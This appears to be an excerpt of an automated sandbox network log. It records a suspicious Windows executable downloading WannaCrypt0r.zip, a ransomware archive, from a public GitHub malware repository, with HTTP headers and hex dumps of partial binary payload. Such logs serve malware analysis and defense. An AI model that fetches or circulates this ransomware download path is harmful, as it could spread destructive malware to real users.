                                                                                                        2022-09-29 12:45:43 UTC4051INData Raw: 79 0c 8d 3e 14 e6 14 2d 43 6b 61 ef 0d 54 ff c4 35 2d aa 7b 7f bb b0 89 d6 25 7e 52 14 8b 53 6f fa cb ed 1e c2 cf f8 39 87 dc 22 ff 9c c3 73 e6 c3 7a 25 00 95 ca a5 98 5d 45 7c f1 6e 03 d8 0e a3 52 4f 8d 9d f0 10 51 7c 1b 3f 75 23 c3 b5 53 9d 04 a1 54 14 22 c8 f2 5c 0a 85 80 2b 19 40 f6 fd 47 87 a1 dc d3 12 74 67 2d 7c 35 8a af e4 78 f4 dc 42 50 e8 7d 6a 14 63 80 20 b5 2c 0c 6c ed 6b 0e d9 72 3a bc c6 59 91 39 e4 e2 84 75 07 a4 31 93 e7 60 09 68 39 d2 c9 f6 07 f0 83 ef a4 15 f8 c0 96 88 6d 08 3d 23 e1 a0 ee 8e b3 cc 77 c5 64 5e b9 55 07 3f e4 4c 53 7a 23 99 fa 5d bc 3d 89 7c d0 7e d4 9d 49 71 a8 e2 56 86 8f 62 52 b4 45 35 da 93 74 88 86 82 fb 91 ef 9a 2d 7e 84 a1 3a 1b c6 2a ea d1 f0 8a 08 9e ff b8 f1 a6 ae 9b 6e 74 1f 97 da 38 df 5b da a2 f2 22 5c 3f 62
                                                                                                        Data Ascii: y>-CkaT5-{%~RSo9"sz%]E|nROQ|?u#ST"\+@Gtg-|5xBP}jc ,lkr:Y9u1`h9m=#wd^U?LSz#]=|~IqVbRE5t-~:*nt8["\?b
                                                                                                        2022-09-29 12:45:43 UTC4067INData Raw: 83 86 92 f5 d3 d4 1a 67 b2 69 16 fd 26 e4 d6 3f f0 20 f8 46 d7 75 ed e0 75 9d c6 74 d5 8d 80 73 7e 71 0a 32 6f ca dc 76 70 6d 6a f0 15 1f 50 b2 af 4e 0e 19 d8 9b be 5d a3 b0 8b 96 d4 12 60 cb f2 30 ba d4 9e c3 35 51 bb e0 af 55 f2 41 8a 11 98 a4 8c aa 38 41 36 58 f4 b9 6c 11 0e 29 dd 61 d3 77 15 03 6c c2 6a b7 d1 48 8a d4 1f 65 dc 82 6b b0 83 93 77 47 6b 76 9b d6 a5 0c ce ca c7 4a d3 c4 e2 62 b3 69 ae 48 3b 18 ed 4b 5a 85 39 34 3c ee 48 14 4a 35 ef 48 fb 61 80 91 7d bc 96 a5 66 16 9f 2e a2 ca 23 21 ec 54 e8 86 41 c1 e9 e0 8f d2 d2 0c 54 92 0a 40 8c 3d 62 27 b2 33 bc 7f 57 6a 51 89 09 c9 5c 19 11 f0 e2 20 66 36 cb 9e 34 17 35 cc 7d 19 78 f0 91 79 df 91 dc cc 59 51 a6 b4 a9 12 2e ba 73 05 e6 23 2f ac 1b 18 f2 ac ce 51 e3 f1 63 fa a8 bb b1 b2 6f f7 f9 2b d0
                                                                                                        Data Ascii: gi&? Fuuts~q2ovpmjPN]`05QUA8A6Xl)awljHekwGkvJbiH;KZ94<HJ5Ha}f.#!TAT@=b'3WjQ\ f645}xyYQ.s#/Qco+
                                                                                                        2022-09-29 12:45:43 UTC4083INData Raw: b7 97 32 c4 37 22 27 06 d3 98 c3 b8 93 ad 01 94 c7 2b 29 8a 09 db 95 c4 24 c4 60 ec 2a 33 af c3 4b 86 55 6c 3f 37 0a 0f 1f 12 06 9e e8 ed 7a 8a ec fb bc 72 f7 f9 c4 b0 86 cf 3f f9 6c 0f 72 f6 ab 6a a0 7a 3b 08 d4 38 77 5e 78 ec 3a 13 1e c7 59 be 38 65 d3 04 d6 52 ed 54 99 8b 83 7f ee 80 4f 4c 90 b1 40 b4 cc 81 22 15 dd 5e 28 c6 aa a7 eb e0 de 4a 99 b8 bd 98 f3 43 5c 28 25 ff 52 5d 07 e3 0d 5e 9c 94 72 96 65 3a 81 1a 41 62 93 f1 e2 f0 80 f8 b0 6a d5 dc 27 9e 81 61 87 4a 73 54 96 e3 2f 02 a7 54 da e3 ab 00 ad 3a 0b 9c 01 7f 51 b0 05 72 d2 a0 cc 33 bc c7 81 10 cd 6e 10 e8 de ea 44 30 e0 5c 3c 91 77 9c 21 02 85 1f 14 63 c3 19 3b ce cb b3 1c 81 de a0 2f 31 b9 71 ba 26 d8 ef 8d 47 de 45 e4 e0 3a c2 41 d3 1c 79 e6 3e 0c 32 99 e9 1c b1 5f 3a b6 e3 66 4a c9 ec ad
                                                                                                        Data Ascii: 27"'+)$`*3KUl?7zr?lrjz;8w^x:Y8eRTOL@"^(JC\(%R]^re:Abj'aJsT/T:Qr3nD0\<w!c;/1q&GE:Ay>2_:fJ
                                                                                                        2022-09-29 12:45:43 UTC4099INData Raw: 90 c9 dc 7c 8c f4 20 19 89 9e a7 9b a6 53 4e d3 c3 bf 56 a3 92 a6 35 69 33 0f ff 81 ce 4b 35 7d f3 16 24 a7 f9 a2 6e 8b 60 1c 36 29 4e 9e 41 de cd 52 23 8e db 80 12 ec 62 bd d7 f6 35 fa f2 89 69 e1 c8 77 30 3f dc 12 43 b1 3b 35 9c 73 08 d5 16 3f f7 46 41 53 0c 3c 93 98 f9 42 02 fc e1 61 9e 1e 10 7b 1e b7 db 4b 6f e5 65 d6 2a c1 6e 66 c8 81 a2 fe 59 da de 46 f9 16 f3 e2 78 72 74 81 dd 9e 69 3b 36 9f da b3 48 9d 14 21 65 b1 75 82 bc 09 ff d9 db 48 9e 27 fc 73 97 cc a8 51 13 1a e5 de ae c7 bf 59 29 87 c2 4c 6b 22 a8 3f f1 51 3e 59 f2 b5 f9 c7 62 dc 94 6a 8a da f3 7c 52 78 ee 84 14 bb d0 92 d3 04 f0 b3 51 fb cd e9 ac 10 36 9a 25 eb 2d 91 ca 82 c8 e9 df 8f f1 5c 17 e8 9b 3c 0d 07 b1 ba 28 91 23 87 8f b8 90 74 06 81 fb 99 0c 9e d9 c5 12 86 06 c9 3c 27 48 d8 1f
                                                                                                        Data Ascii: | SNV5i3K5}$n`6)NAR#b5iw0?C;5s?FAS<Ba{Koe*nfYFxrti;6H!euH'sQY)Lk"?Q>Ybj|RxQ6%-\<(#t<'H
                                                                                                        2022-09-29 12:45:43 UTC4115INData Raw: ad 3d db 62 96 de 80 a6 2e ad 54 6e a9 18 f6 d4 e7 58 c3 a9 25 08 04 f3 23 81 57 6f 8d 15 4b 0d 00 03 38 79 b2 79 64 c8 bb 62 88 2f 18 a5 a1 9c b2 24 b3 08 82 e4 7d 27 2b eb e6 d2 e5 17 fb 47 59 d4 97 b6 5a 8b f1 e1 82 d4 03 01 46 26 a7 f5 8c 8f c7 7e e2 69 72 e8 0f 67 f3 d5 03 8b ab 2b ca 14 75 92 c6 a1 9c ad 09 5a 7d fa 4c 20 aa 36 39 83 76 05 7f 20 b0 b4 46 cd ad 04 62 7b 5c ed 8d 2d 0a af 00 71 cc 7f ca e4 75 cf e2 c1 13 ee 11 0a 6a 5f bf f7 22 d1 b7 df 85 91 4e a1 3b 69 3d 6d 57 95 67 aa 3a 33 da ad 0d f2 de d6 1a 99 ab 5d d3 73 18 e0 f1 3d 5f 09 5c 11 fd eb fa fa 1b 79 c3 2f 8c 02 51 5f 92 4e b2 71 e0 0e e3 55 24 41 ae 04 c2 3f fa cc d4 eb 9c c2 dd 22 50 b9 e2 c1 f3 7e e1 49 d0 1a c3 94 dc 8d 83 cf 24 09 b5 ae 7e 99 91 10 6d a5 ac b3 bf a5 cf da 59
                                                                                                        Data Ascii: =b.TnX%#WoK8yydb/$}'+GYZF&~irg+uZ}L 69v Fb{\-quj_"N;i=mWg:3]s=_\y/Q_NqU$A?"P~I$~mY


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        24192.168.2.449758140.82.121.3443C:\Users\user\Desktop\4W5dQXszUV.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2022-09-29 12:45:44 UTC4120OUTGET /Endermanch/MalwareDatabase/raw/master/ransomwares/WannaCrypt0r.zip HTTP/1.1
                                                                                                        Host: github.com
                                                                                                        2022-09-29 12:45:44 UTC4120INHTTP/1.1 302 Found
                                                                                                        Server: GitHub.com
                                                                                                        Date: Thu, 29 Sep 2022 12:44:59 GMT
                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                        Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                                        Access-Control-Allow-Origin: https://render.githubusercontent.com
                                                                                                        Location: https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/ransomwares/WannaCrypt0r.zip
                                                                                                        Cache-Control: no-cache
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                                        X-Frame-Options: deny
                                                                                                        X-Content-Type-Options: nosniff
                                                                                                        X-XSS-Protection: 0
                                                                                                        Referrer-Policy: no-referrer-when-downgrade
                                                                                                        Expect-CT: max-age=2592000, report-uri="https://api.github.com/_private/browser/errors"
                                                                                                        2022-09-29 12:45:44 UTC4120INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 62 6c 6f 63 6b 2d 61 6c 6c 2d 6d 69 78 65 64 2d 63 6f 6e 74 65 6e 74 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 6f 62 6a 65 63 74 73 2d 6f 72 69 67 69 6e 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e
                                                                                                        Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; block-all-mixed-content; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com objects-origin.githubusercontent.com www.githubstatus.


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        25192.168.2.449759185.199.110.133443C:\Users\user\Desktop\4W5dQXszUV.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2022-09-29 12:45:44 UTC4122OUTGET /Endermanch/MalwareDatabase/master/ransomwares/WannaCrypt0r.zip HTTP/1.1
                                                                                                        Host: raw.githubusercontent.com
                                                                                                        2022-09-29 12:45:44 UTC4122INHTTP/1.1 200 OK
                                                                                                        Connection: close
                                                                                                        Content-Length: 3477754
                                                                                                        Cache-Control: max-age=300
                                                                                                        Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                        Content-Type: application/zip
                                                                                                        ETag: "f2d2308d5c9c4012fb553c82b7938a4339a5db5e022f0a058ece1b06d8a727b6"
                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                        X-Content-Type-Options: nosniff
                                                                                                        X-Frame-Options: deny
                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                        X-GitHub-Request-Id: 0809:67C0:101C7CA:1115ED1:6335934B
                                                                                                        Accept-Ranges: bytes
                                                                                                        Date: Thu, 29 Sep 2022 12:45:44 GMT
                                                                                                        Via: 1.1 varnish
                                                                                                        X-Served-By: cache-mxp6960-MXP
                                                                                                        X-Cache: HIT
                                                                                                        X-Cache-Hits: 1
                                                                                                        X-Timer: S1664455545.741910,VS0,VE5
                                                                                                        Vary: Authorization,Accept-Encoding,Origin
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        X-Fastly-Request-ID: 8d61141d8634536202e9293b6a3a41da15492ba4
                                                                                                        Expires: Thu, 29 Sep 2022 12:50:44 GMT
                                                                                                        Source-Age: 45
                                                                                                        2022-09-29 12:45:44 UTC4123INData Raw: 50 4b 03 04 14 00 01 00 08 00 ac a3 ad 4a aa fc 22 40 3e 10 35 00 00 a0 35 00 1b 00 00 00 45 6e 64 65 72 6d 61 6e 63 68 40 57 61 6e 6e 61 43 72 79 70 74 30 72 2e 65 78 65 6f 0f db 68 af 01 aa 98 b9 37 e0 93 e8 38 9b 1c 5d 92 7d 1d 81 21 e7 ab 1c 27 cd f4 c9 34 aa 90 bb 64 6c d1 0e 57 d5 03 fa a7 d3 a2 dc 6e 89 67 e9 31 78 19 3b 1f 1d 3a d2 b0 d0 24 57 d4 e1 c6 b3 29 40 d4 13 5d 74 20 b1 b5 85 73 bf 49 ef af a4 c9 4a 92 ab c7 42 0c 3a 9a 7c 98 66 63 4a 0d b6 d9 48 74 53 83 cb 7d 19 58 00 15 50 65 b6 b2 30 8c 14 06 ae e7 66 35 55 df f2 16 2f 88 d0 5e 40 78 9b 4f 9d 09 80 69 94 b2 d3 ca 12 63 f2 d8 fe d2 3a 6e 6f f0 89 ce 22 6d df 96 4f c5 24 c8 8c 8c 8d 2e 85 cc 02 e0 3c 1c fc 48 1b df 66 24 a3 96 9b 30 a0 a8 47 81 f7 56 19 44 83 a0 79 e6 99 0e 57 6e e9 01
                                                                                                        Data Ascii: PKJ"@>55Endermanch@WannaCrypt0r.exeoh78]}!'4dlWng1x;:$W)@]t sIJB:|fcJHtS}XPe0f5U/^@xOic:no"mO$.<Hf$0GVDyWn
                                                                                                        2022-09-29 12:45:44 UTC4139INData Raw: 31 62 06 2a df 4b a1 7f d9 d1 99 69 81 6a 12 3c 26 20 f2 7a 97 f7 10 b7 f8 01 15 25 5a a5 9b 09 c6 1a 04 a5 e1 37 89 4d d7 ee 2a 4c 24 a0 ed 42 ed 9b 0e d3 73 c1 ed 28 b8 0f fd ed b6 9b a8 23 4c 89 7b 52 64 2b 6d ad 9f 4a 23 b9 f8 5b 18 0c 53 72 cc 77 b6 62 dd 39 b5 41 03 41 af 90 8e f8 c0 91 6b e7 ec cc 7e be 6c ff 2f 2f 7c 4e 21 6e 56 05 79 d3 ef 32 2b d1 90 38 a6 dc 8d 5d 20 2f ce c8 f6 ab c1 a1 ff b0 4c 94 9f a5 dc ca 73 4d 8f 2f 2c 48 5a 74 6b aa a8 d1 50 21 13 1b cf fb bf 50 55 57 ff a2 0e b4 ad 21 ae c1 8c 0a b6 9f 0a 2b 29 32 b2 3a 36 75 73 89 2c 80 b1 cf 1b 8c 1e f4 79 71 76 8a 31 7b 59 16 b2 91 6a f8 51 cb 27 3a b2 50 1b cc c7 be e0 5e c9 00 72 8f 4b f6 cd 0f 95 d6 85 2f b1 99 8c b2 6c fd fc 56 4b 6b 0e 78 b7 12 33 07 3a f7 53 cb a2 f6 fd 6b de
                                                                                                        Data Ascii: 1b*Kij<& z%Z7M*L$Bs(#L{Rd+mJ#[Srwb9AAk~l//|N!nVy2+8] /LsM/,HZtkP!PUW!+)2:6us,yqv1{YjQ':P^rK/lVKkx3:Sk
                                                                                                        2022-09-29 12:45:44 UTC4155INData Raw: 82 f2 48 4d 61 38 ef 59 22 40 79 85 84 55 b9 96 07 25 7e 6c 51 2d dd e4 3a 98 26 fe 2d d4 cb 9a 2c 9f 1e 0d 75 15 26 01 17 a0 9a 38 83 55 f9 5e 06 95 5a cb 9a f6 48 ca fd 51 ec 3b 07 2d 93 5f 3f 42 fc f9 4a e3 39 e7 86 f6 94 d0 85 9c d5 9f 79 6c 0f dd fc f6 d3 cb 3f 31 f9 cd 76 b1 6c 8e 0e 5b e6 94 ca a7 03 32 e6 be 39 37 1d 4f 30 80 bb 7a 17 3b cc 88 cf 7a 94 11 7d 7b 23 a2 ff 87 39 84 19 68 1c 28 92 01 fc 39 08 ea 04 5f 40 8b 6e cc 7d c0 db 71 91 62 21 64 7a 6c 15 d5 ff 1e 26 73 e5 0b 7a 50 6c 5d 44 cb 3b 74 b0 b7 5c c8 92 74 3b 80 32 c1 e9 6e 9a bc b0 05 51 02 40 97 56 0b e0 f3 29 b8 8a d9 fe e2 57 d0 4b 83 98 ea 51 26 8b 23 a9 07 bf 4f b1 dd cc 37 4b 4b 03 44 99 88 a7 e8 ed 20 1b 6c 6f 96 14 42 29 29 75 dc c6 26 ae bf 0a 45 81 c6 2e 2f 7b 8e 64 74 2c
                                                                                                        Data Ascii: HMa8Y"@yU%~lQ-:&-,u&8U^ZHQ;-_?BJ9yl?1vl[297O0z;z}{#9h(9_@n}qb!dzl&szPl]D;t\t;2nQ@V)WKQ&#O7KKD loB))u&E./{dt,
                                                                                                        2022-09-29 12:45:44 UTC4171INData Raw: f5 73 26 65 2e 70 60 42 cc a8 b5 80 a8 af 30 cb 01 26 b4 ac cb cf 93 a0 b9 82 5d 23 2f 64 bc 4e 44 46 7c 3a a8 02 4f cc db de 1b 0d c2 35 e7 4a 82 80 5d f9 f8 0f 95 87 7b 00 eb 68 8d 0d f8 35 cf 84 0b 93 2b ae 99 3b 76 d2 23 10 b8 71 c1 37 bb a6 60 fa f9 fa a0 fc 6b 9b cb 0b 16 28 72 1f a3 08 c9 0a 5c 2d 3f 79 bb a8 f4 c7 e5 e0 d7 51 51 d4 f5 24 67 6a e3 ca f2 17 8a 52 90 ea cd dc 31 29 40 f3 d1 b9 58 a3 89 48 08 8e ab 0b 21 f6 a9 f0 2f b6 fd 0f bc d1 8f c8 9f f5 3b c9 61 fa c9 50 72 34 bb 93 28 5a 5b 28 d0 6e 32 83 a4 3a 29 5d 13 d5 20 37 80 0d 76 e5 1d 9e 7e 67 91 63 62 76 08 49 ff 93 b2 1c f9 bf ff 04 fe 43 27 13 6d 77 08 b4 5c c2 a7 0c 5e 88 58 71 64 70 df 2b dd 59 d6 e3 59 39 74 37 56 c5 35 3c 95 e4 7e c0 e7 6d 42 45 b7 49 94 bf 8c 62 49 ea 5c 03 5c
                                                                                                        Data Ascii: s&e.p`B0&]#/dNDF|:O5J]{h5+;v#q7`k(r\-?yQQ$gjR1)@XH!/;aPr4(Z[(n2:)] 7v~gcbvIC'mw\^Xqdp+YY9t7V5<~mBEIbI\\
                                                                                                        2022-09-29 12:45:44 UTC4187INData Raw: e1 cb e2 c8 df 3a 6c 64 58 d1 25 d9 0d 8a 1f 3f 29 34 1e 4f 83 29 7b 82 20 7f e6 55 af 05 98 cf 81 e9 7f 85 ce af 11 6d 18 a5 24 31 49 d3 d7 b6 60 de e3 d4 25 de 26 53 12 39 e2 ee e8 41 0b 54 8e cc 97 9d bc fa cd c5 a8 94 6c 5a 46 51 a9 7e 11 ab 53 cd 50 5b 3e 56 7a 79 9b 1c 3a 5a 6d c3 84 d7 3c 66 ea 77 d3 95 49 58 9d 35 cb e7 3b 1f bf e9 15 51 13 79 8c 4d 47 91 ed 13 ad 3d 90 d9 ba 2f 44 4a 91 fc 9e 9c 44 26 94 23 ef e0 a1 e8 7e b8 e4 aa d0 21 b8 73 49 a7 4e 44 dd 13 28 76 52 f7 75 77 7d 71 0b 67 b9 17 d2 5f 2f 8f f3 35 ba 7a 73 c3 e0 59 f3 db e9 ab cb 40 03 83 0f c7 8b 23 72 10 b9 4f 2c 0d 97 cf 98 92 35 f1 6f a7 e8 3f 44 28 d5 56 a9 a9 75 c8 62 4b d0 5e 57 29 29 12 d0 45 20 64 8e 7f 38 95 83 f8 35 4c 55 c1 7d 86 7b cf 44 1b d6 45 b3 ca 8f 5a 6d 14 39
                                                                                                        Data Ascii: :ldX%?)4O){ Um$1I`%&S9ATlZFQ~SP[>Vzy:Zm<fwIX5;QyMG=/DJD&#~!sIND(vRuw}qg_/5zsY@#rO,5o?D(VubK^W))E d85LU}{DEZm9
                                                                                                        2022-09-29 12:45:44 UTC4203INData Raw: 5c 0a 4e 61 ee 3b 81 cb 9e 76 4d 68 bd 60 c8 30 43 24 7d 7c c7 90 21 ae 9f 6f 2a bf 00 9c 63 42 ee 15 2b 96 68 82 0b 27 71 72 9e a5 43 9c ff 2e 99 e9 79 9b 39 41 67 7b 2a 87 54 fd 38 de c4 c8 17 fa bd 26 5c 76 df 58 b3 33 af e8 c1 61 b1 bc 8b aa 38 aa 45 40 e4 a6 66 fa 93 77 69 f9 be d5 7a 7c f6 99 7f d8 ce 1c 4c 9a 1e 14 19 ff 74 a5 39 00 75 e8 61 eb 27 04 47 ae 78 6e 8c 54 f4 2e b3 da bf e6 5a 26 50 89 8b db 70 f4 cd b5 71 37 69 fb 76 3d ed 10 ef 17 cf 81 1e ee 47 b3 19 4d 1e ff 76 25 cb 54 81 30 a2 f4 61 43 f9 59 27 4d 78 a9 7c a8 3e 53 d8 96 33 40 a9 c9 ce 7f c2 eb 5b 1a 6e c2 8b 28 ce fe a5 23 a1 1a 27 7e 5c 8c 7f fc 5a 45 e2 6c 1b 10 d1 fe c8 8e 7f f6 f3 37 ef 7e 0f b3 99 a3 a6 02 51 00 b7 29 3e dd 58 f7 32 54 82 c6 81 26 ea 5d 49 ec 22 96 82 62 3f
                                                                                                        Data Ascii: \Na;vMh`0C$}|!o*cB+h'qrC.y9Ag{*T8&\vX3a8E@fwiz|Lt9ua'GxnT.Z&Ppq7iv=GMv%T0aCY'Mx|>S3@[n(#'~\ZEl7~Q)>X2T&]I"b?
                                                                                                        2022-09-29 12:45:44 UTC4219INData Raw: 6d 41 b0 7c cb 6e f9 2b f4 c7 ee de 75 d8 9a 3e 34 67 17 df ff ff 21 97 8b 73 0c 78 f5 0e ec 90 e5 bb 13 92 83 5a 3d ef 92 48 95 92 fb aa b3 cd 37 38 fb 32 61 3f a5 91 8e e1 34 01 ec 17 22 5c 72 9e 11 7d a9 e6 24 7a 94 b8 7a 08 3f 62 fb 47 c2 10 42 dc 74 e4 fc 60 e5 82 62 cc 58 8e cc 93 89 7e 25 97 a1 25 e3 7e 27 c1 7b a5 75 19 6e 40 59 72 4f 7e 8f 1d a2 60 96 3b eb 12 40 73 1b 6b 73 b4 a5 a1 44 ca 1c b4 55 26 d5 11 52 0c 09 ac fb fa a4 e1 b8 57 2c 85 39 b4 b3 5d 49 13 2d 94 af 9c 94 0e c8 08 74 86 ac 4e d5 02 9a 10 3b a3 ec d5 85 cf 71 58 da d2 3e f8 d0 34 1d e6 01 ee e2 b1 df e2 72 aa 0c 5c ae 3a b5 eb 60 3e 9b a2 83 ab 49 c0 4f 91 85 0b 27 46 54 34 25 bb a7 76 53 65 2d b3 a3 f4 b2 d3 65 be a2 68 76 ec 15 01 cd 42 24 cf 04 5d 8c 9d c2 56 b7 dc 5f 61 c8
                                                                                                        Data Ascii: mA|n+u>4g!sxZ=H782a?4"\r}$zz?bGBt`bX~%%~'{un@YrO~`;@sksDU&RW,9]I-tN;qX>4r\:`>IO'FT4%vSe-ehvB$]V_a
                                                                                                        2022-09-29 12:45:44 UTC4235INData Raw: 09 83 dc e6 9a cc fa fe 3f b6 97 87 e4 bf 78 dd 61 88 cc 45 61 c7 0f e0 3a 15 9b 2f 72 dc ad df 85 8a 0a bd 17 08 13 a4 b1 d5 3e 63 57 5e e6 3a 21 3f 56 b0 f6 56 3a 4b 38 73 d7 76 a4 9e 79 40 75 2b 08 c5 82 2f fc 1c 56 05 c2 18 8a f7 f8 be b2 fb 70 8c d1 27 32 17 21 c8 3e c0 ca f2 aa 99 2d 2d 67 0c f2 2a ce 6a 3a 80 d6 92 0e b5 cb f6 34 20 30 fc 07 fb f6 85 c9 49 94 de 2b c5 52 75 82 8b 83 93 8e df 86 02 08 63 81 73 64 0d 9a 47 aa 49 ac f9 9c 3d cf d4 6d a3 9c 2b 4f fa 26 e8 ea 27 5f c0 3c e2 37 89 21 ad 46 08 7f 26 35 d9 a5 75 4a 90 de 2b 06 d8 3f b9 cf 6c e8 5e e9 af 4a 9b 23 9b 43 d6 cd 1f cf d7 b5 bd 05 c8 64 29 25 4f 4f d2 f6 56 cc b2 38 5e 5a 34 89 dc ba 92 0b b1 e3 07 4e b8 28 d7 a4 53 b3 68 15 c1 80 46 17 64 e3 20 bb f4 eb c0 ca fd ac 84 f7 67 57
                                                                                                        Data Ascii: ?xaEa:/r>cW^:!?VV:K8svy@u+/Vp'2!>--g*j:4 0I+RucsdGI=m+O&'_<7!F&5uJ+?l^J#Cd)%OOV8^Z4N(ShFd gW
                                                                                                        2022-09-29 12:45:44 UTC4251INData Raw: 85 28 30 e7 64 d9 6b fa c9 d3 d1 6c 50 5e 43 0d 31 00 d0 8e 6c 03 d6 43 8e c3 c7 8a 9f 13 c7 3b 45 3d f3 96 14 56 f7 b8 c5 4a 90 de f7 f2 30 07 e9 aa 4e 54 24 b6 16 c3 4c 78 0d 16 67 68 a7 59 a0 95 f2 6d bf ce 3a a1 e6 e4 59 fc da 95 7d 61 a5 24 c6 2e 98 ce 89 11 91 59 0b 9d fd 96 83 b8 0c cc 2e c7 89 c1 93 5a eb 31 09 ae ac e2 65 08 81 e2 b2 c5 c3 cc da 1f ae a4 c2 a5 3b d0 6c 3a 24 62 96 b3 33 9b 1a b9 f7 f8 4f a9 82 24 1b 48 04 a7 46 c5 01 24 c7 82 83 09 a4 be 01 51 1f d1 1a 9a 44 44 ca 47 ef 28 33 c4 b6 0c e7 d5 33 02 d3 ba b3 4a 0c 8c 0c b2 15 dd 15 14 b6 06 5a 34 14 56 74 ec 60 f1 9a b7 70 2a 7e 8b c2 8e 13 88 31 5d a8 af db 44 4c 78 76 ac b3 b0 5a b4 a0 a7 59 34 20 8a b1 86 ff b9 41 a8 e2 c8 81 2e a4 be d9 4c 58 03 94 cf 10 c5 9c 67 f4 41 3b 16 33
                                                                                                        Data Ascii: (0dklP^C1lC;E=VJ0NT$LxghYm:Y}a$.Y.Z1e;l:$b3O$HF$QDDG(33JZ4Vt`p*~1]DLxvZY4 A.LXgA;3
                                                                                                        2022-09-29 12:45:44 UTC4267INData Raw: b4 d6 3c b1 9a c9 eb e0 82 75 a2 30 e7 36 6b 90 30 c8 29 b1 97 64 8d 45 0b c5 51 5a 59 fa 62 a2 65 6e 13 a6 b7 d0 7a 60 7f 4d de a2 43 d7 a5 f2 33 d5 b4 0c d0 b1 6f 29 be cf 55 0b 11 c2 3e 7d a6 19 f7 d0 1f 1b 06 c0 0e 53 c0 9d ec 1e 04 c1 d1 b7 b2 84 da a4 07 1d 1c f2 90 47 e7 c3 e6 cb ed 92 07 15 46 e2 14 f9 44 c0 3e 77 22 03 c6 c9 e7 97 25 6d 93 a6 c6 12 69 57 88 8c e9 fa 81 22 26 7e 7c 07 bf 08 b9 fd dc 17 b4 dc f3 67 1a 52 aa 9b e8 9a 9d fe a6 9f 02 4d f2 76 1e a3 5f 5c 75 a7 69 63 ea 8d 06 d1 80 3f 49 a0 c1 f4 fb 74 c2 f4 ea 11 e0 65 e8 2e 6b dc 81 ab 43 8a 0e 93 3a 56 0d c4 39 5e 55 6e 6f 1a d9 a4 e2 8c 44 e7 ec c4 de e9 d5 fc db ad ea 51 cf f8 a7 d4 4d b2 8d 17 03 e8 e4 6e 21 07 ef ef d5 8f 5d 0d a4 f8 45 c0 94 df 51 81 2a fd 32 db d4 f5 ac a1 16
                                                                                                        Data Ascii: <u06k0)dEQZYbenz`MC3o)U>}SGFD>w"%miW"&~|gRMv_\uic?Ite.kC:V9^UnoDQMn!]EQ*2
                                                                                                        2022-09-29 12:45:44 UTC4283INData Raw: 88 03 29 5a 2d 55 21 44 11 15 3e 5a c2 10 65 0b ef 6d cb 8e bf 29 1b f6 d4 f2 0a 36 1c db fc e3 b7 db 52 cf e2 0f 37 d1 55 b8 79 0f 29 02 f9 f1 19 01 f7 6b fb bd d4 23 1b 95 1c 5b 61 9f 47 ca ad d0 29 1a 75 d5 56 70 c4 79 34 11 55 58 96 9c e2 57 8f b2 96 e4 80 ec b0 90 f9 49 f9 0c 5c 27 6c 90 04 09 4a 20 80 12 31 c4 02 1d 8e 49 b9 1c 0c bf f7 de 42 64 86 5f 82 a5 15 ac 4d 5d 63 1f 82 e2 61 78 21 0a e1 b1 02 87 bc 36 62 39 57 2a c8 1c a7 4f a9 b8 f9 ed 35 e5 0b 2b 7c b0 9e 97 f1 44 4f 1f 4d 1a c2 c3 2f 73 93 b7 39 97 2a 1e 57 91 9f b1 6d 73 f3 72 17 7e b4 8f b2 80 eb 40 e0 96 d3 97 10 78 82 99 cc c3 d0 c3 b8 63 93 21 ab 08 2d 25 79 05 be 22 f4 89 53 13 15 14 e0 04 98 b4 44 36 a9 ef 24 64 a7 6c 3b 12 b6 75 0c cd 02 c3 b0 7f fd f8 aa 17 20 8a 72 5e 80 48 ef
                                                                                                        Data Ascii: )Z-U!D>Zem)6R7Uy)k#[aG)uVpy4UXWI\'lJ 1IBd_M]cax!6b9W*O5+|DOM/s9*Wmsr~@xc!-%y"SD6$dl;u r^H
